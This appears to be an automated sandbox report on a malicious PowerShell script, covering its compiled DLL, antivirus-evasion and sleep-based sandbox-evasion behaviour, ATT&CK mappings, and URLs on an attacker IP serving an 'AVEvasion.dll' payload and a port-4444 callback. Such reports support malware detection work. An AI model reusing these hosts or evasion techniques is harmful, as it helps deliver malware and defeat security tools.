    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mshtml.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: powrprof.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wkscli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msiso.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdb source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.pdbhP source: powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdb source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\justs\source\repos\avevasion\AVEvasion\obj\Release\net48\AVEvasion.pdbSHA256 source: powershell.exe, 00000000.00000002.2380893802.000001B129860000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE52B55 pushad ; iretd 0_2_00007FFB4AE52B69
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE5845E push eax; ret 0_2_00007FFB4AE5846D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE57C5E push eax; retf 0_2_00007FFB4AE57C6D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE5842E pushad ; ret 0_2_00007FFB4AE5845D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE57C2E pushad ; retf 0_2_00007FFB4AE57C5D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE500BD pushad ; iretd 0_2_00007FFB4AE500C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE5785E push eax; iretd 0_2_00007FFB4AE5786D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFB4AE5782E pushad ; iretd 0_2_00007FFB4AE5785D
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll (dropped file)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (92 identical events)
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (13 identical events)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4024
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5867
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll (dropped file)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 708 | Thread sleep time: -11068046444225724s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWo
    Source: powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.0.cs (dropped file)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES80CF.tmp" "c:\Users\user\AppData\Local\Temp\1ut2qrcn\CSCB06954D52E141279519B5296B9E4C4.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2381147505.000001B129B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count of matched signatures shown next to a technique in the matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (11); Non-Application Layer Protocol (1); Application Layer Protocol (121); Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

Source | Detection | Scanner | Label
Execute.ps1 | 33% | Virustotal | -
Execute.ps1 | 13% | ReversingLabs | Win32.Trojan.Generic

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\1ut2qrcn\1ut2qrcn.dll | 100% | Joe Sandbox ML | -

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://158.101.196.44/AVEvasion.dll | 100% | Avira URL Cloud | malware
https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUv | 0% | Avira URL Cloud | safe
http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK | 0% | Avira URL Cloud | safe
http://158.101.196.44 | 0% | Avira URL Cloud | safe
https://158.101.196.44/ | 0% | Avira URL Cloud | safe
https://158.101.196.44:4444/ | 0% | Avira URL Cloud | safe
https://158.101.196.44/) | 0% | Avira URL Cloud | safe
http://158.101.196.44/random.txt | 100% | Avira URL Cloud | malware
https://158.101.196.44:4444/g | 0% | Avira URL Cloud | safe
    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://158.101.196.44/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUveHgf_eBT_6eycCpPO7RK | true | Avira URL Cloud: safe | unknown
http://158.101.196.44/random.txt | true | Avira URL Cloud: malware | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://158.101.196.44/AVEvasion.dll | powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp, Execute.ps1 | false | Avira URL Cloud: malware | unknown
http://158.101.196.44 | powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B1127A4000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://158.101.196.44/ | powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://158.101.196.44:4444/3Z4Nkumhl7F-GH8aHH-CfwIKMKqHgiASExjCc1WithmsUE0Mv6p-DMAk1ELFEyElo36nwNUv | powershell.exe, 00000000.00000002.2379335925.000001B129451000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2379335925.000001B129497000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000000.00000002.2357981222.000001B112276000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://158.101.196.44:4444/ | powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2374757249.000001B1211D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2357981222.000001B112A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2374757249.000001B121092000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://158.101.196.44:4444/g | powershell.exe, 00000000.00000002.2379335925.000001B1293C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://158.101.196.44/) | powershell.exe, 00000000.00000002.2379335925.000001B129484000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2357981222.000001B111021000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2357981222.000001B111252000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
158.101.196.44 | unknown | United States | 31898 | ORACLE-BMC-31898US | true
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1591975
                          Start date and time:2025-01-15 16:01:13 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Execute.ps1
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winPS1@6/12@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 91%
                          • Number of executed functions: 5
                          • Number of non-executed functions: 1
                          Cookbook Comments:
                          • Found application associated with file extension: .ps1
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information

Time | Type | Description
10:02:17 | API Interceptor | 584955x Sleep call for process: powershell.exe modified
                          No context
                          No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
ORACLE-BMC-31898US | Invoice No 1122207 pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | PDF6UU0CVUO2W-YGVUIO.scr.exe | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
ORACLE-BMC-31898US | PO#_1100015533.scr | malicious | MassLogger RAT, PureLog Stealer | 193.122.130.0
ORACLE-BMC-31898US | 1nl3hc.ps1 | malicious | MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | Contrarre.exe | malicious | MassLogger RAT | 193.122.6.168
ORACLE-BMC-31898US | Company introduction.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | rDEKONT-1_15_2025__75kb__pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
ORACLE-BMC-31898US | RFQ_AS0101402025.22025_PDF.exe | malicious | MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | m68k.elf | malicious | Unknown | 193.122.239.186
ORACLE-BMC-31898US | 50201668.exe | malicious | MassLogger RAT | 193.122.130.0
                          No context
                          No context
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11608
                          Entropy (8bit):4.891267907306711
                          Encrypted:false
                          SSDEEP:192:x9smzdcU6Cj9dcU6C7Vsm5emdV9smbib4xYTVsm5emdqxoe5gpOWib4g2Ca6pZlM:XFfib4xYTfHib4nopbjvwRjdvRIikjhQ
                          MD5:5966004D80284773CCED7E826107C77F
                          SHA1:BCDB6F37234D2BEEDE3DB0D16DFBF47658FDDD3F
                          SHA-256:984F8EFEF1FF59DEF37228414F8CDADE33AE01123BC15D9800210CE59C307D90
                          SHA-512:C13EB96E4F98E41361C8E53C566E7E1B625DAD58F190746890B3595015E95A02213EEE3930565FECECA9900AA64A234B178ED7E31E0D29F971E19CCC3E391CB7
                          Malicious:false
                          Reputation:low
